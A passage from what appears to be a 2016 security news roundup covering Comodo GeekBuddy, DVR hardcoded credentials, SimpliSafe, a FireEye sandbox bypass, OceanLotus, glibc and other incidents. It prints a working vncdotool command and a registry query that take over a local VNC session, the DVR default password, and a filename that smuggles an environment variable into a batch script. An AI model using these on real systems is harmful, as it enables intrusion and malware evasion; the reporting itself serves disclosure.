$ printf "key ctrl-esc\ntype calc.exe\nkey enter\n" | vncdotool -p 7d4612e5 -s localhost::5901 -
I'm using vncdotool from here:
https://github.com/sibson/vncdotool
(Note: if there is no SerialNumber field, TotalTracks needs to be repeated twice, I think this is a bug)
Or alternatively you can pull the password out of HKLM, just truncate it to 8 characters(!!!):
$ reg query HKLM\\System\\Software\\COMODO\\CLPS\ 4\\CA /v osInstanceId
HKEY_LOCAL_MACHINE\System\Software\COMODO\CLPS 4\CA
osInstanceId REG_SZ 7d4612e59b27e4f19fc3d8e3491fb3bb879b18f3
Ormandy reported the issue to Comodo on January 19, on February 10 the company released a fix in the version 4.25.380415.167 of GeekBuddy.
Tens of thousands of DVRs exposed on Internet with Hardcoded Passwords
19.2.2016 Hacking
According to a report published by Risk Based Security more than tens of thousands of DVRs are exposed on the Internet with a hardcoded password.
According to a report published by Risk Based Security (RBS), the firmware of DVRs manufactured by China-based Zhuhai RaySharp contains hardcoded credentials that could be used by a remote hacker to gain control of the devices.
“DVRs based on the Zhuhai RaySharp DVR firmware provide a webbased management interface for users to manage the device, view feeds from connected surveillance cameras, and use the PTZ (PanTiltZoom) controls. It was found that the interface contains hardcoded credentials that allow anyone to easily access the device. ” states the report.
The digital video recorders include a web interface that allows users to manage the devices, access the recorded video, and control surveillance cameras.
The access to the devices is very simple, they are all configured with the same username “root” and the password “519070.”
There are more than tens of thousands of digital video recorders (DVRs) exposed on the Internet, security experts at Risk Based Security used Shodan revealed that there are between 36,000 and 46,000 DVRs accessible from the web, most of them located in the US.
The security issue is much more extended, according to the experts many other vendors worldwide (i.e. Defender, Lorex, KGuard Security, König, Swann, and COP USA) commercialize digital video recorders using firmware affected by this vulnerability (CVE-2015-8286).
Experts at Risk Based Security reported the vulnerability to the US-CERT in September 2015 that notified all affected vendors in October. Some vendors are working to their own patches but many of them still haven’t solved the problem and RaySharp has yet to release a fix.
The problem affecting DVRs is quite common for IoT devices, poorly configured devices expose them to cyber attacks.
Using SimpliSafe Home Security? — You're Screwed! It's Easy to Hack & Can't be Patched
18.2.2016 Vulnerebility
If you are using a SimpliSafe wireless home alarm system to improve your home security smartly, just throw it up and buy a new one. It is useless.
The so-called 'Smart' Technology, which is designed to make your Home Safer, is actually opening your house doors for hackers. The latest in this field is SimpliSafe Alarm.
SimpliSafe wireless home alarm systems – used by more than 300,000 customers in the United States – are Hell Easy to Hack, allowing an attacker to easily gain full access to the alarm and disable the security system, facilitating unauthorized intrusions and thefts.
…and the most interesting reality is: You Can Not Patch it!
As the Internet of Things (IoT) is growing at a great pace, it continues to widen the attack surface at the same time.
Just last month, a similar hack was discovered in Ring – a Smart doorbell that connects to the user's home WiFi network – that allowed researchers to hack WiFi password of the home user.
How to Hack SimpliSafe Alarms?
According to the senior security consultant at IOActive Andrew Zonenberg, who discovered this weakness, anyone with basic hardware and software, between $50 and $250, can harvest alarm's PIN and turn alarm OFF at a distance of up to 200 yards (30 meters) away.
Since SimpliSafe Alarm uses unencrypted communications over the air, thief loitering near a home with some radio equipment could sniff the unencrypted PIN messages transferred from a keypad to the alarm control box when the house owner deactivates the alarm.
The attacker then records the PIN code on the microcontroller board's memory (RAM) and later replay this PIN code to disable the compromised alarm and carry out burglaries when the owners are out of their homes.
Moreover, the attacker could also send spoofed sensor readings, like the back door closed, in an attempt to fool alarm into thinking no break-in is happening.
Video Demonstration of the Hack
You can watch the video demonstration that shows the hack in work:
"Unfortunately, there's no easy workaround for the issue since the keypad happily sends unencrypted PINs out to anyone listening," Zonenberg explains.
Here's Why Your Smart Alarms are Unpatchable
Besides using the unencrypted channel, SimpliSafe also installs a one-time programmable chip in its wireless home alarm, leaving no option for an over-the-air update.
"Normally, the vendor would fix the vulnerability in a new firmware version by adding cryptography to the protocol," Zonenberg adds. But, "this isn't an option for the affected SimpliSafe products because the microcontrollers in currently shipped hardware are one-time programmable."
This means there is no patch coming to your SimpliSafe Alarm, leaving you as well as over 300,000 homeowners without a solution other than to stop using SimpliSafe alarms and buy another wireless alarm systems.
Zonenberg said he has already contacted Boston-based smart alarm provider several times since September 2015, but the manufacturer has not yet responded to this issue. So, he finally reported the issue to US-CERT.
VXE Flaw allowed threats to bypass FireEye detection engine
18.2.2016 Vulnerebility
Researchers at Blue Frost Security firm discovered a flaw in the FireEye Virtual Execution Engine (VXE) that allows an attacker to completely bypass virtualization-based dynamic analysis and whitelist malware.
Security researchers at Blue Frost Security have found a high severity vulnerability in FireEye products that allowed an attacker to bypass the company’s detection engine and temporarily whitelist malware.
The experts reported the flaw to FireEye in September 2015, the company promptly patched the issue and released and an update of the FireEye Operating System (FEOS). FireEye also requested Blue Frost to wait until mid-February to disclose the flaw because many customers had still not applied the updates.
The flaw resides in the FireEye’s Virtual Execution Engine (VXE), a crucial component of the defense solutions that performs dynamic analysis on files. The component is used is several products of the FireEye portfolio, including the FireEye Network Security (NX), the Email Security (EX), the Malware Analysis (AX), and the File Content Security (FX).
1245812-fireeye
Every time the FireEye’s Virtual Execution Engine analyzes a binary present on a Windows machine it copies it into a virtual machine with the name “malware.exe.” Before the file is analyzed, the engine executes a script to copy the binary to a temporary location and rename it to its original filename.
The experts discovered that the software doesn’t sanitize the original filename allowing an attacker to use Windows environment variables inside the original filename which are resolved inside the batch script.
“FireEye is employing the Virtual Execution Engine (VXE) to perform a dynamic analysis. In order to analyze a binary, it is first placed inside a virtual machine. A Windows batch script is then used to copy the binary to a temporary location within the virtual machine, renaming it from “malware.exe” to its original file name.
copy malware.exe "%temp%\fire_in_the_eye.exe"
No further sanitization of the original filename is happening which allows an attacker to use Windows environment variables inside the original filename which are resolved inside the batch script. Needless to say this can easily lead to an invalid filename, letting the copy operation fail.” states the security advisory from Blue Frost.
“Let’s take the filename FOO%temp%BAR.exe which results in:
copy malware.exe "%temp%\FOOC:\Users\admin\AppData\Local\TempBAR.exe" The filename, directory name, or volume label syntax is incorrect. 0 file(s) copied.
The batch script continues and tries to execute the binary under its new name which of course will fail as well because it does not exist.”
The batch script attempts to execute the file in the virtual machine monitoring for malicious behavior, but the filename is invalid and causes the failure of the copying operation. As result, the file is no longer executed and the engine is no able to detect malicious activity. At this point, the Virtual Execution Engine considers the file clean and add its MD5 hash to a whitelist of binaries that have already been analyzed and that will no longer be analyzed until the next day.
“Once a binary was analyzed and did not show any malicious behavior, its MD5 hash is added to an internal list of binaries already analyzed. If a future binary which is to be analyzed matches an MD5 hash in this list, the analysis will be skipped for that file. The MD5 hash will stay in the white list until it is wiped after day.” Blue Frost Security said in its advisory. “This effectively allows an attacker to whitelist a binary once and then use it with an arbitrary file name in a following attack. The initial binary with the environment variable embedded in its filename could e.g. be hidden in a ZIP file together with several other benign files and sent to an unsuspicious email address. Once this ZIP file was downloaded or sent via email a single time, the MD5 hash of the embedded malware would be whitelisted and the binary could then be used with an arbitrary file name without detection.”
FireEye is one the most important firm in the security industry and immediately worked on the development of a security patch (FX 7.5.1, AX 7.7.0, NX 7.6.1 and EX 7.6.2) which have been already released.
“FireEye encourages all customers to update their systems to the latest released version where noted below. FireEye has issued maintenance releases and fixes for all security issues contained within this advisory. ” states the company.
FireEye confirmed that it has not seen any active exploits of the evasion technique against its customers.
A sophisticated variant of OceanLotus trojan targets OS X systems
18.2.2016 Apple
In May 2015, the Chinese security firm Qihoo 360 published a report on a Trojan called OceanLotus that was being used since 2012 for APT attacks in the Chinese market.
The APT attacks based on the OceanLotus focused on government organizations, research institutes, maritime agencies, and companies specializing in other activities.
At the time were found four different versions of the Trojan, and one of them was specifically designed to target OS X systems.
AlienVault analyzed two of these samples available for OS X (one of them being probably an early version). A more recent variant was analyzed and was updated to Virustotal on February 8 and had a zero detection rate, at the time I was writing this post the OceanLotus malware was detected by 11 / 55 antivirus solutions, including ESET-NOD32, Ikarus, F-Secure and Bitdefender.
As the title of the article says, the Trojan is disguised as an Abode Flash Player update.
The developers of the Trojan used a XOR encryption because with this technique its more difficult to detected. The commands used by the API shows that developers are familiar with OS X commands, and this makes sense because OnceanLotus has a specific version of OS X.
When a system is infected, OnceanLotus prepares an agent to attempt to contact his command and control (C&C) servers. When getting a connection with the C&C servers, the Trojan will collect information from the infected system, including device name, username, and a unique ID, and determines if the victim has root privileges.
The malware has the capability to perform many tasks, like opening application bundles, returning information about a file or path, getting a list of recently opened documents, obtaining information on active windows, capturing screenshots, downloading files from a URL, executing files, killing a process, and deleting files.
“The OS X version of OceanLotus is clearly a mature piece of malware that is written specifically for OS X. The use of OS X specific commands and APIs is evidence that the authors are intimately familiar with the operating system and have spent quite a bit of time customizing it for the OS X environment. Similar to other advanced malware, the use of obfuscation and indirection within the binary are an indication that the authors want to protect their work, make it difficult for others to reverse engineer, and reduce detection rates. The fact that VirusTotal still shows a zero detection rate for this threat shows they are succeeding at the latter.” States the analysis published by Alien Vault.
I will also leave you here the Indicator of compromise ( IOC):
Hashes:
ROL3 encoded .en_icon: 9cf500e1149992baae53caee89df456de54689caf5a1bc25750eb22c5eca1cce
ROL3 decoded .en_icon: 3d974c08c6e376f40118c3c2fa0af87fdb9a6147c877ef0e16adad12ad0ee43a
ROL3 encoded .DS_Stores: 4c59c448c3991bd4c6d5a9534835a05dc00b1b6032f89ffdd4a9c294d0184e3b
ROL3 decoded .DS_Stores: 987680637f31c3fc75c5d2796af84c852f546d654def35901675784fffc07e5d
EmptyApplication: 12f941f43b5aba416cbccabf71bce2488a7e642b90a3a1cb0e4c75525abb2888
App bundle
83cd03d4190ad7dd122de96d2cc1e29642ffc34c2a836dbc0e1b03e3b3b55cff
Another older variant that only communicates with the unencrypted C2
a3b568fe2154305b3caa1d9a3c42360eacfc13335aee10ac50ef4598e33eea07
C2s:
kiifd[.]pozon7[.]net
shop[.]ownpro[.]net
pad[.]werzo[.]net
Dropped Files:
/Library/.SystemPreferences/.prev/.ver.txt or ~/Library/.SystemPreferences/.prev/.ver.txt
/Library/Logs/.Logs/corevideosd or ~/Library/Logs/.Logs/corevideosd
/Library/LaunchAgents/com.google.plugins.plist or ~/Library/LaunchAgents/com.google.plugins.plist
/Library/Parallels/.cfg or /~Library/Parallels/.cfg
/tmp/crunzip.temp.XXXXXX (passed to mktemp(), so the actual file will vary)
~/Library/Preferences/.fDTYuRs
/Library/Hash/.Hashtag/.hash (or ~/Library/Hash/.Hashtag/.hash)
Hollywood Hospital Pays $17,000 Ransom to Hacker for Unlocking Medical Records
18.2.2016 Hacking
Ransomware has seriously turned on to a noxious game of Hackers to get paid effortlessly.
Once again the heat was felt by the Los Angeles-based Presbyterian Medical Center when a group of hackers had sealed all its sensitive files and demanded $17,000 USD to regain the access to those compromised data.
The devastation of the compromised files can be pitched as:
Compromised emails
Lockout Electronic Medical Record System [EMR]
Encrypted patient data
Unable to carry CT Scans of the admitted patients
Ferried risky patients to nearby hospitals
...and much more unexplained outcomes.
The hospital had confirmed that the Ransomware malware had hit its core heart a week before, potentially affecting the situation to grow much worse.
Hospital End up Paying $17,000
As the situation was grown out of wild, the hospital paid 40 Bitcoins (Roughly US $17,000) to the Ransomware Criminals to resume their medical operations after gaining the decryption keys.
"The quickest and most efficient way to restore our systems and administrative functions was to pay the ransom and obtain the decryption key," the hospital CEO Allen Stefanek said in a letter.
All the electronic medical system were restored back soon after unlocking the encrypted file locks.
The Ransomware had stolen the nights of many network administrators, as they would be often blamed to fight up this nasty threat; instead of blaming staffs who click the illegit links in their e-mail.
The FBI Advises Victims to Just Pay the Ransom
Last year, even the FBI advised paying off the Ransom amount to the ransomware criminals as they had not come up with any other alternatives.
Several companies had got webbed in the Ransomware business including a US Police Department that paid US $750 to ransomware criminals three years back.
Criminals often demand the ransom in BTC (their intelligent move) for the surety of not getting caught, as Bitcoin transactions are non-trackable due to its decentralized nature.
So until and unless a permanent solution evolves, users are requested not to click malicious or suspected links sent via an unknown person.
The frequent payment to Ransomware encourages the hackers in the dark to stash the cash and develop a more enticing framework for the next target.
But affecting a medical system is a heinous crime as hospitals are acting as a bridge between life and heaven.
Apple vs. FBI — Google Joins Tim Cook in Encryption Backdoor Battle
18.2.2016 Apple
In the escalating battle between the Federal Bureau of Investigation (FBI) and Apple over iPhone encryption, former National Security Agency (NSA) contractor Edward Snowden and Google chief executive Sundar Pichai just sided with Apple's refusal to unlock iPhone.
Yesterday, Apple CEO Tim Cook refused to comply with a federal court order to help the FBI unlock an iPhone owned by one of the terrorists in the mass shootings in San Bernardino, California, in December.
Here's What the FBI is Demanding:
The federal officials have asked Apple to make a less secure version of its iOS that can be used by the officials to brute force the 4-6 digits passcode on the dead shooter's iPhone without getting the device's data self-destructed.
Cook called the court order a "chilling" demand that "would undermine the very freedoms and liberty our government is meant to protect." He argued that to help the FBI unlock the iPhone would basically providing an Encryption Backdoor that would make the products less secure.
Backdoor for Government, Backdoor for All
However, Apple is worried that once this backdoor gets created and handed over to the FBI, there would be chances that the backdoor will likely get into the hands of malicious hackers who could use it for evil purposes.
Although many politicians, including Donald Trump, have slammed Apple's decision, Google has stepped up and taken a public stand in support of Apple's decision.
"I agree 100 percent with the courts," Trump said in a statement. "But to think that Apple won't allow us to get into her cell phone, who do they think they are? No, we have to open it up."
Google Sided with Apple
In a series of tweets late Wednesday, Pichai sided with Apple while saying "forcing companies to enable hacking could compromise users' privacy" and "requiring companies to enable hacking of customer devices & data. Could be a troubling precedent."
However, Pichai took more than 12 hours to talk about this burning issue, after Edward Snowden pointed out that Google had not yet stepped forward to speak up on his stand.
"The @FBI is creating a world where citizens rely on #Apple to defend their rights, rather than the other way around," Snowden tweeted on Wednesday. Snowden called on Google to stand with Apple, saying, "This is the most important tech case in a decade."
Pichai's stance is basically:
The technology companies will give its customers' data to law enforcement when it is required to, but the companies will not put in a "Backdoor" for the government.
While the statements made by Pichai is not quite as forceful as Cook's statement published in an open letter to its customers, we can assume both Google and Apple are together, at least in the sense that the federal agencies are asking too much.
Anonymous leaked 18GB of data belonging to the Turkish national police
18.2.2016 Hacking
Members of the Anonymous group have stolen 18GB worth of data belonging to Turkey’s national police force and leaked it online.
The group of hacktivists Anonymous has just released roughly 18GB of sensitive data belonging to the Turkey’s national police.
The hackers have accessed the database of the Turkish General Directorate of Security (EGM) and leaked the archive on file sharing websites.
Anonymous targeted the Turkish authorities to protest against widespread corruption within the Turkish government.
“Hey Turkey, I have something to show you tomorrow. See, if you fight your citizens, they will bite back. #standby.” states a tweet posted on Sunday by the account @CthulhuSec
anonymous hacked turkish government
The same account shared a link to precious archive a day after the fist tweet, “Enjoy responsibly” stated the message.
anonymous hacked turkish government 2
The link shared points to a page including the links to the archive and the following message:
“I have been asked to release the following files by ROR[RG], who is responsible for collecting them.
The material was taken from the EGM which is the Turkey National Police.
The source has had persistent access to various parts of the Turkish Government infrastructure for the past 2 years and
in light of various government abuses in the past few months, has decided to take action against corruption by releasing this.” reports the page.
The access to the 17.8 GB data requires “some knowledge of databases”:
“As with everything I share, I do not make any claims for the data. However, please note you may require some knowledge
of databases to be able to properly extrapolate information from this data set. If anyone can make a more accessible
version for the less technically inclined, ping it over to me and I will add it here.”
Anonymous already targeted the Turkish Government, in December 2015 it launched a number of cyberattacks on the Turkey’s internet, forcing the nation to shut down thousands of websites.
The Turkish authorities haven’t commented the incident.
Researcher hacks medical devices and the whole hospital with ease
18.2.2016 Hacking
Sergey Lozhkin, a security expert at Kaspersky Lab demonstratd how it is easy for hackers to compromise medical devices and critical healthcare infrastructure.
The ascent in the Internet of Things (IoT) has left gadgets more associated, yet much of the time more vulnerable, than at any other time. From auto hacking to digital assaults against the vitality area, it has never been more essential for producers and IT groups to have a ‘security-first’ disposition.
Yet in spite of a precarious ascent in fruitful hacks, security is regularly disregarded. In a recent study as a feature of the recently held Security Analyst Summit in Spain, Sergey Lozhkin, a senior cyber specialist at security firm Kaspersky Lab, has turned his attention on doctor’s facilities to exhibit how simple it truly is for an online attacker to bargain critical medicinal infrastructure.
“If something goes wrong with medical equipment, if someone hacked a device that helps a doctor to identify an illness, if someone could affect this data a healthy person could be treated as an ill person or the opposite,” He said. “If someone affects the results of for example, MRI, it could be really rough.”, adding further.
In his discussion, Lozhkin laid out how he could hack into the clinic’s system effortlessly – and consent – in the wake of discovering vulnerable restorative gadgets recorded on Shodan.
“I decided that this is a critical area and I wanted to research it. I decided to look on the internet, I found the hospital, tested the WiFi network and finally I was able to connect to an MRI device and find personal information and [flaws] in the architecture. It was scary because it was really easy” He explained. “The initial vector was the WiFi network, the network was not really as secure as it should be in such a place where you keep medical data.”
Shodan is a platform used to sweep open ports on the web and is frequently utilized by cyber security researchers to reveal critical infrastructures that ought to be better ensured. In reality, the ‘internet searcher’ nature of Shodan frequently courts’ discussions for connecting to open gadgets such as webcams and, in the latest case, the baby monitors.
“[Shodan] can get some answers concerning the equipment and programming associated [to the internet] and in the event that you know, for instance, what input a MRI or laser or cardiology gadget gives when you interface with its port, you can go to Shodan and discover about several of these gadgets and on the off chance that you know a weakness you can hack every one of them,” the Kaspersky analyst cautioned.
“For this situation it was simple. Therapeutic gadgets are still shaky, I can see it. A few makers truly secure them however some [developers] are pondering web security in second or third place.”
Investigating the eventual fate of IoT, Lozhkin included: “I think lots of people from both sides, the white-hat security researchers and the bad guys, are deeply researching this area – car hacking, connected cars, medical devices, everything. For cyber criminals it could be a big market.”
Most as of late, an inward crisis was announced at a noteworthy US doctor’s facility in Los Angeles taking after an across the board ransomware-style cyberattack that left staff not able to get to fundamental patient information.
Instagram Adds Two-Step Verification to Prevent Account from being Hacked
17.2.2016 Hacking
Hijacking an online account is not a complicated procedure, not at least in 2016.
Today, Instagram confirmed that the company is in the process to roll out two-factor authentication for its 400 Million users.
It is impossible to make your online accounts hack-proof, but you can make them less vulnerable.
Then what you can do to protect yourselves from hackers?
Several companies provide more enhanced steps like Encrypted Channel Services, Security Questions, Strict Password Policy and so on.
But, what would you do if a hacker had somehow managed to access your accounts’ passwords?
Since the online accounts do not have an intelligent agent inbuilt to verify whether the person is the legit driver of the account; beyond a username and password match.
Hence the concept of Two-Factor Authentication (2FA) born out!
Jumbos like Google, Facebook, Twitter and Amazon have already blended the 2FA feature with their services to tackle account hijacking.
2-Factor Authentication or two-step verification is an additional security mechanism that certifies the user is legit after clearing dual identification step i.e. a randomly generated security code would be provided to the user via call/SMS for authentication.
2-Factor Authentication eliminates the hackers to intrude into your online accounts (even if they have your usernames and passwords).
Now, the Multimedia sharing Giant Instagram also joined the league by implementing two-step verification.
Better late than Never:
However, the decision to roll out 2FA feature could be criticized as it's parent company Facebook had already implemented it five years back.
The current users could not expect the new two-step verification feature to get released soon, as the company had mentioned that they would slowly release the phone verification feature.
But yes, there is good news for Singapore Residents. As the first roll would be out for Singaporeans.
Earlier, Instagram hacking was a deja vu as many videos and images of celebrities leaked online in the yesteryears.
Hackers could create havoc such as hijacking or deletion of Instagram Accounts, flooding the account with illegit contents and much more. Taylor Swift was one of such victims of the Instagram hack.
To save yourself from hackers you are recommended to enable 2-Factor Authentication when the Instagram security feature as soon as rolls for your country.
GCHQ helped US in developing Stuxnet, claims a documentary
17.2.2016 BigBrothers
A new documentary titled Zero Days revealed that the Stuxnet cyber weapon was just a small part of a much bigger Information Warfare operation (code named “NITRO ZEUS”) against the Iranian civilian infrastructure.
A new documentary titled Zero Days has revealed more disconcerting news on the Stuxnet worm, the first malware recognized by security industry as a cyber weapon. The documentary sheds light on the US war program that included the design of Stuxnet, it also reveals that hundreds of thousands of network implants and backdoors in Iran networks were managed by Western entities to penetrate Iranian infrastructure and destroy them.
Zero Days presented at the Berlin Film Festival confirms that Stuxnet was developed under the Information warfare operation called “Olympic Games,” which is part of a wider programme dubbed “Nitro Zeus” that involves hundreds of US cyber security experts. The US was not alone, the Israeli Government has a primary role in the Nitro Zeus program.
The documentary confirms that the nation-state hackers behind Stuxnet spent a significant effort in the attempting to covert their operation, they also designed the threat by restricting its operation only against Iranian machines.
Natanz-SCADA Stuxnet
One of the most intriguing novelties proposed in the documentary is the involvement of the GCHQ intelligence, the film sustains that the British intelligence provided information for the development of the four zero-day exploits specifically designed to hit the control systems at the Natanz facility.
The experts at the NSA have hardly worked to cover the tracks after the infection became public, but the author of the report confirmed the existence of a more aggressive version of Stuxnet developed by the Israeli force that went out of control infecting thousands of computers across more than 115 countries.
It is not clear is the GCHQ was informed about the Nitro Zeus program.
NSA’s Top-Secret SKYNET May Be Killing Thousands of Innocent Civilians
17.2.2016 BigBrothers
NSA’s Top-Secret SKYNET May Be Killing Thousands of Innocent Civilians With Drones
So what do you expect from an Artificially intelligent program run by the government intelligence agency?
Possibly killing innocent people.
The real-life SKYNET, the fictional malevolent artificial intelligence in the Terminator movies, run by the US National Security Agency (NSA) is a surveillance program that uses cell phone metadata to track the GPS location and call activities of suspected terrorists, who may be shot by a Hellfire missile.
Now, a new analysis of previously published NSA documents leaked by former NSA staffer Edward Snowden suggests that many of those people killed based on metadata may have been innocent.
Last year, the leaked documents detailing the NSA's SKYNET programme published by The Intercept showed that NSA had used a machine learning algorithm on the cellular network metadata of 55 Million people in Pakistan to rate each citizen's likelihood of being a terrorist.
You need to know that the US drone bombing campaigns in Pakistan have been raging for years.
Elementary Errors in SKYNET
However, the spy agency has made elementary errors in their machine-learning algorithm, which lead to the generation of thousands of false leads, potentially exposing innocent people to remote assassination by drone.
One of the leaked slides claimed that SKYNET has a false-positive rate of 0.008%, in some cases, and the NSA was using about 55 million people’s phone records for SKYNET.
But, Ars Technica points out that, even at this minute rate, many innocent people are possibly mislabeled. Some of the NSA's tests even saw higher error rates of 0.18%, which means mislabeling nearly 99,000 people out of the 55 Million.
"There are very few 'known terrorists' to use to train and test the model," Patrick Ball, the executive director of Human Rights Data Analysis Group, told the site. "If they are using the same records to train the model as they are using to test the model, their assessment of the fit is completely bullshit."
The purpose SKYNET serves is not clear yet. Although SKYNET could be part of non-violent surveillance programs, like tracking and monitoring suspected terrorists, Ars suggests this technology could potentially be used to target drone strikes.
US Drone Strike Killed Almost 4,000 People
Since 2004, the United States government has carried out hundreds of drone strikes against alleged terrorists in Pakistan and killed somewhere between 2,500 and 4,000 people, the Bureau of Investigative Journalism reported.
The NSA has not yet commented on how the agency used SKYNET, and how the technology was trained.
But Does Killing people "Based on Metadata" actually make sense?
Maybe it is easy to say YES, it makes sense as it happened or is happening far away in a foreign land. But imagine if SKYNET gets turned on us.
Linux Fysbis Trojan, a new weapon in the Pawn Storm’s arsenal
17.2.2016 Virus
Malware researchers at PaloAlto discovered the Fysbis Trojan, a simple and an effective Linux threat used by the Russian cyberspy group Pawn Storm.
Do you remember the Pawn Storm hacking crew? Security experts have identified this group of Russian hackers with several names, including APT28, Sofacy or Sednit, it has been active since at least 2007.
The name Pawn Storm is used by security experts to reference an active economic and political cyber-espionage operation targeting a wide range of entities, most of them belonging to the military, governments, and media industries.
Specific targets include:
Military agencies, embassies, and defense contractors in the US and its allies
Opposition politicians and dissidents of the Russian government
International media
The national security department of a US ally
The Pawn Storm ATP group is considered a high sophisticated threat that has the availability of zero-day exploits in its arsenal. The groups used several strains of malware for the different OS available on the market, including mobile spyware designed to infect Apple iOS devices. One of the principal tools used by the Russian hackers is a Windows backdoor called Sednit.
Now the group is back again targeting Linux systems with a Trojan dubbed Fysbis that is able to compromise targets without requiring highly privileged access. According to the malware researchers at PaloAlto networks, the Fysbis Trojan is a preferred malware used to infect Linux systems despite it isn’t a sophisticated threat.
“The Linux malware Fysbis is a preferred tool of Sofacy, and though it is not particularly sophisticated, Linux security in general is still a maturing area, especially in regards to malware. In short, it is entirely plausible that this tool has contributed to the success of associated attacks by this group. This blog post focuses specifically on this Linux tool preferred by Sofacy and describes considerations and implications when it comes to Linux malware.” the PaloAlto researchers said Friday in a blog post.
The Fysbis Thojan implements a modular structure, the core components are a set of plugins that could be loaded to add new functionalities to the agent.
“Fysbis is a modular Linux trojan / backdoor that implements plug-in and controller modules as distinct classes. For reference, some vendors categorize this malware under the Sednit attacker group naming designation. This malware includes both 32-bit and 64-bit versions of Executable and Linking Format (ELF) binaries. Additionally, Fysbis can install itself to a victim system with or without root privileges.” continues the analysis published by the PaloAlto Networks.As a
The Fysbis Trojan was designed to exfiltrate potentially sensitive documents and spy on the user’s Web browsing and other activities.
The experts at the PaloAlto Networks’s Unit 42 have observed that APT groups tend to reuse the history command and control infrastructure. The analysis of the Fysbis Trojan samples confirmed this behavior, however in the latest variants the threat actor used also previously unknown servers.
The choice to develop a Linux trojan doesn’t surprise the experts, the Linux OS is preferred platform within data centers, cloud infrastructure for businesses, and application servers. Linux is also the core of Android devices and many other embedded systems. There is also another aspect to consider, many business environments mainly use Windows systems, this means that they are more efficient in detecting Windows threats due to the adoption of specific defense solutions.
Critical glibc Flaw Puts Linux Machines and Apps at Risk (Patch Immediately)
17.2.2016 Vulnerebility
A highly critical vulnerability has been uncovered in the GNU C Library (glibc), a key component of most Linux distributions, that leaves nearly all Linux machines, thousands of apps and electronic devices vulnerable to hackers that can take full control over them.
Just clicking on a link or connecting to a server can result in remote code execution (RCE), allowing hackers to steal credentials, spy on users, seize control of computers, and many more.
The vulnerability is similar to the last year's GHOST vulnerability (CVE-2015-0235) that left countless machines vulnerable to remote code execution (RCE) attacks, representing a major Internet threat.
GNU C Library (glibc) is a collection of open source code that powers thousands of standalone apps and most Linux distributions, including those distributed to routers and other types of hardware.
The recent flaw, which is indexed as CVE-2015-7547, is a stack-based buffer overflow vulnerability in glibc's DNS client-side resolver that is used to translate human-readable domain names, like google.com, into a network IP address.
The buffer overflow flaw is triggered when the getaddrinfo() library function that performs domain-name lookups is in use, allowing hackers to remotely execute malicious code.
How Does the Flaw Work?
The flaw can be exploited when an affected device or app make queries to a malicious DNS server that returns too much information to a lookup request and floods the program's memory with code.
This code then compromises the vulnerable application or device and tries to take over the control over the whole system.
It is possible to inject the domain name into server log files, which when resolved will trigger remote code execution. An SSH (Secure Shell) client connecting to a server could also be compromised.
However, an attacker need to bypass several operating system security mechanisms – like ASLR and non-executable stack protection – in order to achieve successful RCE attack.
Alternatively, an attacker on your network could perform man-in-the-middle (MitM) attacks and tamper with DNS replies in a view to monitoring and manipulating (injecting payloads of malicious code) data flowing between a vulnerable device and the Internet.
Affected Software and Devices
All versions of glibc after 2.9 are vulnerable. Therefore, any software or application that connects to things on a network or the Internet and uses glibc is at RISK.
The widely used SSH, sudo, and curl utilities are all known to be affected by the buffer overflow bug, and security researchers warn that the list of other affected applications or code is almost too diverse and numerous to enumerate completely.
The vulnerability could extend to a nearly all the major software, including:
Virtually all distributions of Linux.
Programming languages such as the Python, PHP, and Ruby on Rails.
Many others that use Linux code to lookup the numerical IP address of an Internet domain.
Most Bitcoin software is reportedly vulnerable, too.
Who are Not Affected
The good news is users of Google's Android mobile operating system aren't vulnerable to this flaw. As the company uses a glibc substitute known as Bionic that is not susceptible, according to a Google representative.
Additionally, a lot of embedded Linux devices, including home routers and various gadgets, are not affected by the bug because these devices use the uclibc library as it is more lightweight than hefty glibc.
The vulnerability was first introduced in May 2008 but was reported to the glibc maintainers July 2015.
The vulnerability was discovered independently by researchers at Google and Red Hat, who found that the vulnerability has likely not been publicly attacked.
The flaw was discovered when one of the Google's SSH apps experienced a severe error called a segmentation fault each time it attempted to contact to a particular Internet address, Google's security team reported in a blog post published Monday.
Where glibc went Wrong
Google researchers figured out that the error was due to a buffer overflow bug inside the glibc library that made malicious code execution attacks possible. The researchers then notified glibc maintainers.
Here's what went wrong, according to the Google engineers:
"glibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query. Later on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated."
"Under certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow."
Proof-of-Concept Exploit Released
Google bod Fermin J. Serna released a Proof-of-Concept (POC) exploit code on Tuesday.
With this POC code, you can verify if you are affected by this critical issue, and verify any mitigations you may wish to enact.
Patch glibc Vulnerability
Google researchers, working with security researchers at Red Hat, have released a patch to fix the programming blunder.
However, it is now up to the community behind the Linux OS and manufacturers, to roll out the patch to their affected software and devices as soon as possible.
For people running servers, fixing the issue will be a simple process of downloading and installing the patch update.
But for other users, patching the problem may not be so easy. The apps compiled with a vulnerable glibc version should be recompiled with an updated version – a process that will take time as users of affected apps have to wait for updates to become available from developers.
Meanwhile, you can help prevent exploitation of the flaw, if you aren’t able to immediately patch your instance of glibc, by limiting all TCP DNS replies to 1024 bytes, and dropping UDP DNS packets larger than 512 bytes.
For more in-depth information on the glibc flaw, you can read Red Hat blog post.
Cisco Industrial switches affected by an unpatched flaw
17.2.2016 Vulnerebility
Cisco disclosed a DoS vulnerability affecting the IOS software running on the industrial switches belonging to the Industrial Ethernet 2000 Series.
Last week I wrote about a vulnerability affecting CISCO Universal Small Cell kits that allows unauthenticated remote users to retrieve devices’ firmware, now another vulnerability is worrying the customers of the IT Giants. The flaw coded as CVE-2016-1330 affects Cisco Industrial Ethernet 2000 Series Switches running IOS Software 15.2(4)E.
The flaw affects the way the devices processes Cisco Discovery Protocol (CDP) packets, an unauthenticated attacker with access to the network can send specially crafted CDP packets to the Cisco Industrial Switches to cause vulnerable devices to reload.
“A vulnerability in the processing of Cisco Discovery Protocol (CDP) packets by Cisco IOS Software for Cisco Industrial Ethernet 2000 Series Switches could allow an unauthenticated, adjacent attacker to cause an affected device to reload.” states the Cisco Security Advisory. “The vulnerability is due to improper processing of crafted CDP packets. An attacker could exploit this vulnerability by sending a crafted CDP packet to an affected device. An exploit could allow the attacker to cause the affected device to reload.”
Cisco has yet to release a patch to solve the issue and there are no workarounds, fortunately, the vulnerability hasn’t been exploited in the wild.
